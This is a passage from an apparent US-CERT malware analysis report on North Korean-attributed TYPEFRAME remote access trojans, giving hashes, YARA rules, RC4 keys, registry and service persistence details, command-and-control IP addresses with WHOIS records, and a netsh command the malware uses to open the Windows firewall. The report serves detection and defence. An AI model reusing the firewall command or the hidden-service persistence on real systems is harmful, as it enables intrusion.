found.\r\nPE Metadata\r\nCompile Date 2017-06-05 21:21:48-04:00\r\nImport Hash c1bcec5e2d5d967daefaff0a252273a6\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n55b6d1ed6d76c7d17cc270bc1843d2cb header 1024 2.558659\r\n6e501513865a783fa945269010ac3785 .text 69632 6.390707\r\n45584c7afdc086b651d7299673643506 .rdata 24064 4.704433\r\n4a8e757aef91c54de52d5b81098e0cc7 .data 7680 4.003255\r\nde3fe99833797faa77379640174d16c4 .pdata 4096 4.786623\r\n0cc425d0556c63acb7c04b9b1a211d5b .rsrc 512 5.105006\r\n914f25782a74f42e42d7974b13bd01c8 .reloc 1536 2.869845\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 8.0 (DLL)\r\nRelationships\r\nc9e3b83d77... Contains e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef\r\nDescription\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 26 of 40\n\nThis file is a 64-bit Windows executable version of the file\r\n8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8 and is designed to install a RAT as a service on\r\nthe victim’s system. This file accepts the following arguments during execution\r\n\"68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd\".\r\nThe RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nDecrypted strings of interest are displayed below:\r\n--Begin strings of interest--\r\nhost.dll\r\n\"Task Notification Service\"\r\n\"Monitors And Notifies Task Scheduling And Interaction\"\r\nnetsvcs\r\n--End strings of interest--\r\nWhen executed, the RAT loads an embedded RC4 encrypted archive file from the start of the offset \"0x1A800\" of the file.\r\nThe malware decrypts the archive using the same Rc4 key. The decrypted archive contains a malicious DLL module, which\r\nis decompressed and installed into \"C:\\Windows\\system32\\dwnhost.dll”. The first three characters of the module name are\r\nrandomly generated.\r\nThe malware contains RC4 encrypted configuration file data (192 bytes). During runtime, it installs the encrypted\r\nconfiguration data into the following registry key:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\dwnhost.dll\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe malware installs a malicious DLL module as a serviceDLL in the \"netsvcs\" service group in order to execute\r\n\"C:\\Windows\\system32\\dwnhost.dll\" by Windows service hosting process, \"%SYSTEMROOT%\\system32\\svchost.exe”.\r\nThe service name and the display name are randomly generated.\r\nThe installed service information is displayed below:\r\n--Begin service--\r\nServiceName = \"NWCWorkstation\"\r\nDisplayName = \"NWCWorkstation\"\r\nDesiredAccess = SERVICE_ALL_ACCESS\r\nServiceType = SERVICE_WIN32_SHARE_PROCESS\r\nStartType = SERVICE_AUTO_START\r\nBinaryPathName = \"%SYSTEMROOT%\\system32\\svchost.exe -k netsvcs\"\r\n--End service--\r\ne088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef\r\nTags\r\nremote-access-trojantrojan\r\nDetails\r\nName dwnhost.dll\r\nSize 1030144 bytes\r\nType PE32+ executable (DLL) (GUI) x86-64, for MS Windows\r\nMD5 9722bc9e0efb4214116066d1ff14094c\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 27 of 40\n\nSHA1 41a938499048a6ad8034d09e2fbb893da8f13ca9\r\nSHA256 e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef\r\nSHA512 8470c240868441093314ebe263028ceef61d900b41aaeed77fd934edf81b9a75f6c96d0fccc0ac87364c8e23e0b8eb19ec8bcd47daf1d50c11\r\nssdeep 12288:nqU713B5hV7rJIBBAVbyjRbjSbdSYJ3raxt7o6qRBpDwQmnQ2bqPjD+PmCNVGsPf:nRxJIB7hSZSG37jo/GsPepCdOwy\r\nEntropy 6.424883\r\nAntivirus\r\nAhnlab Trojan/Win32.Agent\r\nAntiy Trojan/Win32.AGeneric\r\nBitDefender Trojan.GenericKD.31025935\r\nClamAV Win.Trojan.Typeframe-6595036-1\r\nCyren W64/Trojan.IFZB-3557\r\nESET a variant of Win64/NukeSped.BA trojan\r\nEmsisoft Trojan.GenericKD.31025935 (B)\r\nIkarus Trojan.Win64.Nukesped\r\nK7 Riskware ( 0040eff71 )\r\nMcAfee RDN/Generic.dx\r\nNANOAV Trojan.Win64.NukeSped.fepuhl\r\nSophos Troj/NukeSped-U\r\nTrendMicro BKDR64_.512A3DD3\r\nTrendMicro House Call BKDR64_.512A3DD3\r\nZillya! Trojan.Generic.Win32.68467\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\" strings: $s0 =\r\n{A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6\r\nD5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3\r\n03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)\r\nand all of them }\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\ne088c3a0b0... Contained_Within c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777\r\nDescription\r\ndwnhost.dll (original name: DLL64.dll) is a 64-bit Windows dynamic-link library (DLL) of \"laxhost.dll\"\r\n(a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6). This RAT module was installed as a service\r\nby the file \"c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777”.\r\nThe RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 28 of 40\n\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nWhen executed, the RAT loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\dwnxhost.dll\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe decrypted data contains a hexadecimal encoded command and control IP address and port number:\r\n--Begin IP and port # list--\r\nBB 01 3B 5A 5D 61 ==\u003e 59.90.93.97:443\r\n--End IP and port # list--\r\nThe malware attempts to connect to its remote server IP 59.90.93.97 using port 443 and waits for instructions.\r\nThe malware is designed to accept instructions from the remote server to perform the following functions:\r\n--Begin functions perform by the malware--\r\nGet Disk Free Space\r\nSearch for files\r\nExecute process in elevated mode\r\nTerminate processes\r\nDelete files\r\nExecute command-using shell\r\nDownload and upload files\r\nRead files and write files\r\nDelete Service and uninstall malware components using a batch script\r\n--End functions perform by the malware--\r\n20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\nTags\r\nremote-access-trojantrojan\r\nDetails\r\nName EF9DB20AB0EEBF0B7C55AF4EC0B7BCED\r\nSize 152064 bytes\r\nType PE32+ executable (GUI) x86-64, for MS Windows\r\nMD5 ef9db20ab0eebf0b7c55af4ec0b7bced\r\nSHA1 0202942d11c994cece943bb873f3af156d820f59\r\nSHA256 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\nSHA512 85fa80079c59da83e3b2471eab0d2981c92b6c589cbe5052bf438831ae464e6499040ead68d6bc9929edd9f6c08ecc6abf2a0173e31bd361a\r\nssdeep 3072:qocqUTuIzXblpGxqSDBiiBmLEEjdTIf3TIb9Qw/uAZyerrPabYlQ:qJqUnXKxqSAiBJyTC3TIb9QRL0lQ\r\nEntropy 6.269643\r\nAntivirus\r\nAntiy Trojan/Win32.AGeneric\r\nAvira TR/AD.APTLazerus.ciszm\r\nBitDefender Trojan.GenericKD.31020049\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 29 of 40\n\nClamAV Win.Trojan.Typeframe-6595037-1\r\nCyren W64/Trojan.CWPJ-5887\r\nESET a variant of Win64/NukeSped.L trojan\r\nEmsisoft Trojan.GenericKD.31020049 (B)\r\nIkarus Trojan.Win64.Nukesped\r\nK7 Trojan ( 00535d221 )\r\nMcAfee Generic.dvq\r\nMicrosoft Security Essentials Trojan:Win32/Autophyte.A!dha\r\nNANOAV Trojan.Win64.NukeSped.feqzil\r\nSophos Troj/NukeSped-V\r\nSymantec Trojan Horse\r\nTrendMicro BKDR64_.97ED50E7\r\nTrendMicro House Call BKDR64_.97ED50E7\r\nVirusBlokAda Trojan.Autophyte\r\nZillya! Trojan.NukeSped.Win64.21\r\nYara Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2016-09-07 14:28:45-04:00\r\nImport Hash 13c53cfa11bb74ea99fefdf29d78a9f9\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n2082ea5adc4b910e8673c04dc7d962d2 header 1024 2.623906\r\ne6e5ce270a5e80221a815dbf739883a2 .text 111616 6.434048\r\n3a7628ebb18c5e07cf37654fd431de6b .rdata 26112 5.315772\r\n52e12517ca5b2c29e9496bc3032f0d5d .data 5632 2.052338\r\nf9b37a6c76a99538605929f5bef6c2e2 .pdata 5632 5.165417\r\nd5ecc406ee2be45ed510958b0d4f326a .rsrc 512 5.112624\r\n07b2edf2675fa88a86c977fec3ad03cd .reloc 1536 2.826598\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 8.0 (DLL)\r\nRelationships\r\n20abb95114... Connected_To 98.101.211.162\r\n20abb95114... Connected_To 81.0.213.173\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 30 of 40\n\nDescription\r\nThis file is a 64-bit Windows executable designed to connect to its remote server and wait for instructions. The malware’s\r\nfile APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\nDA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B\r\n--End RC4 key--\r\nThis file is a variant of a RAT that contains the following embedded hexadecimal-encoded C2 IP address and port number:\r\n--Begin IP and port # list--\r\n1BBh ==\u003e 443\r\n0A2D36562h ==\u003e 98.101.211.162\r\n0ADD50051h ==\u003e 81.0.213.173\r\n--End IP and port # list--\r\nWhen executed, it attempts to connect to its C2 IPs using port 443 and waits for instructions. The malware is designed to\r\naccept instructions from the remote server to perform additional functions.\r\n201c7cd10a2bd50dde0948d14c3c7a0732955c908a3392aee3d08b94470c9d33\r\nTags\r\nproxytrojan\r\nDetails\r\nName 1C53E7269FE9D84C6DF0A25BA59B822C\r\nSize 126976 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 1c53e7269fe9d84c6df0a25ba59b822c\r\nSHA1 b775d753671133cbc4919764d2fac0d298166b07\r\nSHA256 201c7cd10a2bd50dde0948d14c3c7a0732955c908a3392aee3d08b94470c9d33\r\nSHA512 3d3883b9b29e264d023b7034d980b7c206c9fc82010bf7f5f1dc454fdbd316830fe69e90579406a74afc1fca8e266d10c1b46784bd661dcb2\r\nssdeep 1536:EaMa/KVyD4hv6LLETuA1x+sh2iE1s44tz4qoWYUwnZ7hUOC2:G8YPZ6LLqQFX4tz4quxY\r\nEntropy 6.024087\r\nAntivirus\r\nAhnlab Win-Trojan/Hwdoor.Gen\r\nAntiy Trojan/Win32.AGeneric\r\nAvira TR/AD.APTLazerus.itpsz\r\nBitDefender Gen:Variant.Ursu.239474\r\nClamAV Win.Trojan.Typeframe-6595035-1\r\nCyren W32/Trojan.OYWW-7040\r\nESET a variant of Win32/NukeSped.AK trojan\r\nEmsisoft Gen:Variant.Ursu.239474 (B)\r\nIkarus Trojan.Win32.NukeSped\r\nK7 Trojan ( 0051c2fd1 )\r\nMicrosoft Security Essentials Trojan:Win32/Autophyte.B!dha\r\nNANOAV Trojan.Win32.NukeSped.felyfu\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 31 of 40\n\nSophos Troj/Cruprox-B\r\nSymantec Trojan Horse\r\nTrendMicro TROJ_PROXSPED.A\r\nTrendMicro House Call TROJ_PROXSPED.A\r\nVirusBlokAda Trojan.Autophyte\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule import_deob { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" md5 = \"ae769e62fef4a1709c12c9046301aa5d\" md5 =\r\n\"e48fe20eb1f5a5887f2ac631fed9ed63\" strings: $ = { 8a 01 3c 62 7c 0a 3c 79 7f\r\n06 b2 db 2a d0 88 11 8a 41 01 41 84 c0 75 e8} $ = { 8A 08 80 F9 62 7C 0B 80 F9\r\n79 7F 06 82 DB 2A D1 88 10 8A 48 01 40 84 C9 75 E6} condition: (uint16(0) ==\r\n0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them }\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2015-07-08 22:50:54-04:00\r\nImport Hash 21ccd1b1341683d8831663fc3ed8f86d\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nf066de8df54d4f92795472d981374309 header 4096 0.736742\r\nf066de8df54d4f92795472d981374309 header 4096 0.736742\r\ne321dba33ae4db3b9e29aa6072b92e77 .text 57344 6.464385\r\ne321dba33ae4db3b9e29aa6072b92e77 .text 57344 6.464385\r\na256d5f52608331df8545a9d38751462 .rdata 8192 3.628560\r\na256d5f52608331df8545a9d38751462 .rdata 8192 3.628560\r\n1d905ad87919346eb6c8463f61b599e8 .data 16384 1.547483\r\n1d905ad87919346eb6c8463f61b599e8 .data 16384 1.547483\r\nafdf2120655e37010482a536d552199e .rsrc 32768 7.100033\r\nafdf2120655e37010482a536d552199e .rsrc 32768 7.100033\r\nbbeec3983cc5b2094f8311718d327480 .reloc 8192 3.234713\r\nbbeec3983cc5b2094f8311718d327480 .reloc 8192 3.234713\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 6.0\r\nMicrosoft Visual C++ 6.0 DLL (Debug)\r\nDescription\r\nThis file (original name: Proxy_SVC_DLL.dll) is a proxy module installed as a service. The proxy installer that installs this\r\nmodule was not available for analysis.\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 32 of 40\n\nThis file is designed to open the Windows Firewall on the victim’s machine to allow incoming connections and force the\r\ncompromised system to function as a proxy server. The malware’s APIs and strings (registry key, file names, and service\r\nname) are RC4 encrypted using the following key:\r\n--Begin Rc4 key--\r\nDA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B\r\n--End Rc4 key--\r\nWhen executed, the proxy installer will attempt to load and decrypt the encrypted configuration file data from the registry\r\nusing the RC4 key.\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nAnalysis indicates that the decrypted configuration data contains port numbers. The malware utilized the following\r\ncommand to open the Windows Firewall on the victim’s machine to allow incoming connections:\r\n--Begin firewall modification--\r\n\"netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=\u003cdecrypted port number\u003e\r\naction=allow enable=yes\"\r\n--End firewall modification--\r\nThe malware attempts to open the predefined port and waits for connection. The malware contains public SSL certificates in\r\nits resource name \"101”. It is designed to generate crafted TLS sessions (fake TLS communication mechanism).\r\n98.101.211.162\r\nPorts\r\n443 TCP\r\nWhois\r\nNetRange:     98.100.0.0 - 98.103.255.255\r\nCIDR:         98.100.0.0/14\r\nNetName:        RCMS\r\nNetHandle:     NET-98-100-0-0-1\r\nParent:         NET98 (NET-98-0-0-0-0)\r\nNetType:        Direct Allocation\r\nOriginAS:    \r\nOrganization: Time Warner Cable Internet LLC (RCMS)\r\nRegDate:        2008-03-17\r\nUpdated:        2009-05-05\r\nRef:            https://whois.arin.net/rest/net/NET-98-100-0-0-1\r\nOrgName:        Time Warner Cable Internet LLC\r\nOrgId:         RCMS\r\nAddress:        6399 S Fiddlers Green Circle\r\nCity:         Greenwood Village\r\nStateProv:     CO\r\nPostalCode:     80111\r\nCountry:        US\r\nRegDate:        2001-09-25\r\nUpdated:        2018-03-07\r\nComment:        Allocations for this OrgID serve Road Runner commercial customers out of the Columbus, OH, Herndon,\r\nVA and Raleigh, NC RDCs.\r\nRef:            https://whois.arin.net/rest/org/RCMS\r\nRelationships\r\n98.101.211.162 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 33 of 40\n\n81.0.213.173\r\nPorts\r\n443 TCP\r\nWhois\r\ninetnum:        81.0.213.168 - 81.0.213.175\r\nnetname:        CmsConsulting-CZ\r\ndescr:         CMS Consulting s.r.o.\r\ncountry:        CZ\r\nadmin-c:        CASA3-RIPE\r\ntech-c:         CASA3-RIPE\r\nstatus:         ASSIGNED PA\r\nmnt-by:         CASABLANCA-RIPE-MNT\r\ncreated:        2009-10-09T07:31:35Z\r\nlast-modified: 2009-10-09T07:31:35Z\r\nsource:         RIPE\r\nrole:         Casablanca INT RIPE manager\r\naddress:        Casablanca INT\r\naddress:        Vinohradska 184, Prague 3 - 130 52\r\naddress:        Czech republic\r\nphone:         +420 270 000 270\r\nfax-no:         +420 270 000 277\r\ne-mail:         hostmaster@casablanca.cz\r\nabuse-mailbox: abuse@casablanca.cz\r\nadmin-c:        JH1771-RIPE\r\ntech-c:         JH1771-RIPE\r\nnotify:         hostmaster@casablanca.cz\r\nnic-hdl:        CASA3-RIPE\r\ncreated:        2005-09-05T10:42:10Z\r\nlast-modified: 2015-07-03T11:19:49Z\r\nsource:         RIPE\r\nmnt-by:         CASABLANCA-CORE-MNT\r\n% Information related to '81.0.213.0/24AS15685'\r\nroute:         81.0.213.0/24\r\ndescr:         Casablanca INT prefix fraction\r\norigin:         AS15685\r\nmnt-by:         CASABLANCA-CORE-MNT\r\ncreated:        2017-06-30T09:41:16Z\r\nlast-modified: 2017-06-30T09:41:16Z\r\nsource:         RIPE\r\nRelationships\r\n81.0.213.173 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\n184.107.209.2\r\nPorts\r\n443 TCP\r\nWhois\r\nDomain Name: TVDAIJIWORLD.COM\r\nRegistry Domain ID: 632237350_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.godaddy.com\r\nRegistrar URL: http://www.godaddy.com\r\nUpdated Date: 2017-10-16T06:44:25Z\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 34 of 40\n\nCreation Date: 2006-10-14T19:18:50Z\r\nRegistrar Registration Expiration Date: 2018-10-14T19:18:50Z\r\nRegistrar: GoDaddy.com, LLC\r\nRegistrar IANA ID: 146\r\nRegistrar Abuse Contact Email: abuse@godaddy.com\r\nRegistrar Abuse Contact Phone: +1.4806242505\r\nDomain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited\r\nDomain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited\r\nDomain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited\r\nDomain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited\r\nRegistry Registrant ID: Not Available From Registry\r\nRegistrant Name: ******** ******** (see Notes section below on how to view unmasked data)\r\nRegistrant Organization: Konkandaiz\r\nRegistrant Street: Post Box 53608\r\nRegistrant Street: Dubai\r\nRegistrant City: Dubai\r\nRegistrant State/Province: Not Applicable\r\nRegistrant Postal Code: 04\r\nRegistrant Country: AE\r\nRegistrant Phone: ************\r\nRegistrant Phone Ext:\r\nRegistrant Fax: 111111111111\r\nRegistrant Fax Ext:\r\nRegistrant Email: ********@*****.***\r\nRegistry Admin ID: Not Available From Registry\r\nAdmin Name: ******** ******** (see Notes section below on how to view unmasked data)\r\nAdmin Organization: Konkandaiz\r\nAdmin Street: Post Box 53608\r\nAdmin Street: Dubai\r\nAdmin City: Dubai\r\nAdmin State/Province: Not Applicable\r\nAdmin Postal Code: 04\r\nAdmin Country: AE\r\nAdmin Phone: ************\r\nAdmin Phone Ext:\r\nAdmin Fax: 111111111111\r\nAdmin Fax Ext:\r\nAdmin Email: ********@*****.***\r\nRegistry Tech ID: Not Available From Registry\r\nTech Name: ******** ******** (see Notes section below on how to view unmasked data)\r\nTech Organization: Konkandaiz\r\nTech Street: Post Box 53608\r\nTech Street: Dubai\r\nTech City: Dubai\r\nTech State/Province: Not Applicable\r\nTech Postal Code: 04\r\nTech Country: AE\r\nTech Phone: ************\r\nTech Phone Ext:\r\nTech Fax: 111111111111\r\nTech Fax Ext:\r\nTech Email: ********@*****.***\r\nName Server: MY.PRIVATEDNS.COM\r\nName Server: YOUR.PRIVATEDNS.COM\r\nDNSSEC: unsigned\r\nRelationships\r\n184.107.209.2 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n111.207.78.204\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 35 of 40\n\nPorts\r\n443 TCP\r\nWhois\r\ninetnum:        111.192.0.0 - 111.207.255.255\r\nnetname:        UNICOM-BJ\r\ndescr:         China Unicom Beijing province network\r\ndescr:         China Unicom\r\ncountry:        CN\r\nadmin-c:        CH1302-AP\r\ntech-c:         SY21-AP\r\nremarks:        service provider\r\nmnt-by:         APNIC-HM\r\nmnt-lower:     MAINT-CNCGROUP\r\nmnt-lower:     MAINT-CNCGROUP-BJ\r\nmnt-routes:     MAINT-CNCGROUP-RR\r\nstatus:         ALLOCATED PORTABLE\r\nmnt-irt:        IRT-CU-CN\r\nlast-modified: 2016-05-04T00:18:25Z\r\nirt:            IRT-CU-CN\r\naddress:        No.21,Financial Street\r\naddress:        Beijing,100033\r\naddress:        P.R.China\r\ne-mail:         hqs-ipabuse@chinaunicom.cn\r\nabuse-mailbox: hqs-ipabuse@chinaunicom.cn\r\nadmin-c:        CH1302-AP\r\ntech-c:         CH1302-AP\r\nauth:         # Filtered\r\nmnt-by:         MAINT-CNCGROUP\r\nlast-modified: 2017-10-23T05:59:13Z\r\nperson:         ChinaUnicom Hostmaster\r\nnic-hdl:        CH1302-AP\r\ne-mail:         hqs-ipabuse@chinaunicom.cn\r\naddress:        No.21,Jin-Rong Street\r\naddress:        Beijing,100033\r\naddress:        P.R.China\r\nphone:         +86-10-66259764\r\nfax-no:         +86-10-66259764\r\ncountry:        CN\r\nmnt-by:         MAINT-CNCGROUP\r\nlast-modified: 2017-08-17T06:13:16Z\r\nperson:         sun ying\r\naddress:        fu xing men nei da jie 97, Xicheng District\r\naddress:        Beijing 100800\r\ncountry:        CN\r\nphone:         +86-10-66030657\r\nfax-no:         +86-10-66078815\r\ne-mail:         hostmast@publicf.bta.net.cn\r\nnic-hdl:        SY21-AP\r\nmnt-by:         MAINT-CNCGROUP-BJ\r\nlast-modified: 2009-06-30T08:42:48Z\r\nsource:         APNIC\r\nRelationships\r\n111.207.78.204 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n80.91.118.45\r\nPorts\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 36 of 40\n\n443 TCP\r\nWhois\r\ninetnum:        80.91.118.0 - 80.91.119.255\r\nnetname:        Abissnet\r\ndescr:         Business Customers\r\ncountry:        AL\r\nadmin-c:        AB34506-RIPE\r\ntech-c:         AB34506-RIPE\r\nstatus:         ASSIGNED PA\r\nmnt-by:         AS35047-MNT\r\ncreated:        2014-10-24T10:09:33Z\r\nlast-modified: 2016-06-09T09:47:15Z\r\nsource:         RIPE\r\nrole:         Abissnet BBone\r\naddress:        Rr. Ismail Qemali, P. Abissnet\r\ne-mail:         bbone@abissnet.al\r\nabuse-mailbox: bbone@abissnet.al\r\nnic-hdl:        AB34506-RIPE\r\nmnt-by:         AS35047-MNT\r\ncreated:        2016-06-09T08:09:15Z\r\nlast-modified: 2016-06-09T08:41:05Z\r\nsource:         RIPE\r\n% Information related to '80.91.118.0/24AS35047'\r\nroute:         80.91.118.0/24\r\ndescr:         Abissnet ISP\r\norigin:         AS35047\r\nmnt-by:         AS35047-MNT\r\ncreated:        2011-02-27T10:24:58Z\r\nlast-modified: 2011-02-27T10:24:58Z\r\nsource:         RIPE\r\nRelationships\r\n80.91.118.45 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n181.119.19.56\r\nPorts\r\n443 TCP\r\nWhois\r\nNetRange:     181.0.0.0 - 181.255.255.255\r\nCIDR:         181.0.0.0/8\r\nNetName:        LACNIC-181\r\nNetHandle:     NET-181-0-0-0-0\r\nParent:         ()\r\nNetType:        Allocated to LACNIC\r\nOriginAS:    \r\nOrganization: Latin American and Caribbean IP address Regional Registry (LACNIC)\r\nRegDate:        1993-04-30\r\nUpdated:        2010-07-21\r\nComment:        This IP address range is under LACNIC responsibility\r\nComment:        for further allocations to users in LACNIC region.\r\nComment:        Please see http://www.lacnic.net/ for further details,\r\nComment:        or check the WHOIS server located at http://whois.lacnic.net\r\nRef:            https://whois.arin.net/rest/net/NET-181-0-0-0-0\r\nOrgName:        Latin American and Caribbean IP address Regional Registry\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 37 of 40\n\nOrgId:         LACNIC\r\nAddress:        Rambla Republica de Mexico 6125\r\nCity:         Montevideo\r\nStateProv:    \r\nPostalCode:     11400\r\nCountry:        UY\r\nRegDate:        2002-07-26\r\nUpdated:        2018-03-15\r\nRef:            https://whois.arin.net/rest/org/LACNIC\r\nRelationships\r\n181.119.19.56 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n59.90.93.97\r\nPorts\r\n443 TCP\r\nWhois\r\ninetnum:        59.90.64.0 - 59.90.127.255\r\nnetname:        BB-Multiplay\r\ndescr:         O/o DGM BB, NOC BSNL Bangalore\r\ncountry:        IN\r\nadmin-c:        BH155-AP\r\ntech-c:         DB374-AP\r\nstatus:         ASSIGNED NON-PORTABLE\r\nmnt-by:         MAINT-IN-DOT\r\nmnt-irt:        IRT-BSNL-IN\r\nlast-modified: 2011-02-18T09:27:20Z\r\nsource:         APNIC\r\nirt:            IRT-BSNL-IN\r\naddress:        Internet Cell\r\naddress:        Bharat Sanchar Nigam Limited\r\naddress:        8th Floor,148-B Statesman House\r\naddress:        Barakhamba Road, New Delhi - 110 001\r\ne-mail:         abuse@bsnl.in\r\nabuse-mailbox: abuse@bsnl.in\r\nadmin-c:        NC83-AP\r\ntech-c:         CGMD1-AP\r\nauth:         # Filtered\r\nmnt-by:         MAINT-IN-DOT\r\nlast-modified: 2017-10-20T05:42:50Z\r\nsource:         APNIC\r\nperson:         BSNL Hostmaster\r\nnic-hdl:        BH155-AP\r\ne-mail:         hostmaster@bsnl.in\r\naddress:        Broadband Networks\r\naddress:        Bharat Sanchar Nigam Limited\r\naddress:        2nd Floor, Telephone Exchange, Sector 62\r\naddress:        Noida\r\nphone:         +91-120-2404243\r\nfax-no:         +91-120-2404241\r\ncountry:        IN\r\nmnt-by:         MAINT-IN-PER-DOT\r\nlast-modified: 2015-11-12T06:00:14Z\r\nperson:         DGM Broadband\r\naddress:        BSNL NOC Bangalore\r\ncountry:        IN\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 38 of 40\n\nphone:         +91-080-25805800\r\nfax-no:         +91-080-25800022\r\ne-mail:         dnwplg@bsnl.in\r\nnic-hdl:        DB374-AP\r\nmnt-by:         MAINT-IN-PER-DOT\r\nlast-modified: 2011-02-19T10:03:44Z\r\nsource:         APNIC\r\n% Information related to '59.90.80.0/20AS9829'\r\nroute:         59.90.80.0/20\r\ndescr:         BSNL Internet\r\ncountry:        IN\r\norigin:         AS9829\r\nmnt-lower:     MAINT-IN-DOT\r\nmnt-routes:     MAINT-IN-DOT\r\nmnt-by:         MAINT-IN-AS9829\r\nlast-modified: 2008-09-04T07:54:47Z\r\nsource:         APNIC\r\nRelationships\r\n59.90.93.97 Connected_From a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\nRelationship Summary\r\n8c3e0204f5... Contains a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\na71017302e... Connected_To 59.90.93.97\r\na71017302e... Contained_Within 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8\r\n675a35e04b... Contains e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7\r\ne69d6c2d3e... Contained_Within 675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1\r\nd1d490866d... Contains 40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116\r\n40ef57ca2a... Contained_Within d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92\r\n546dbd370a... Contains 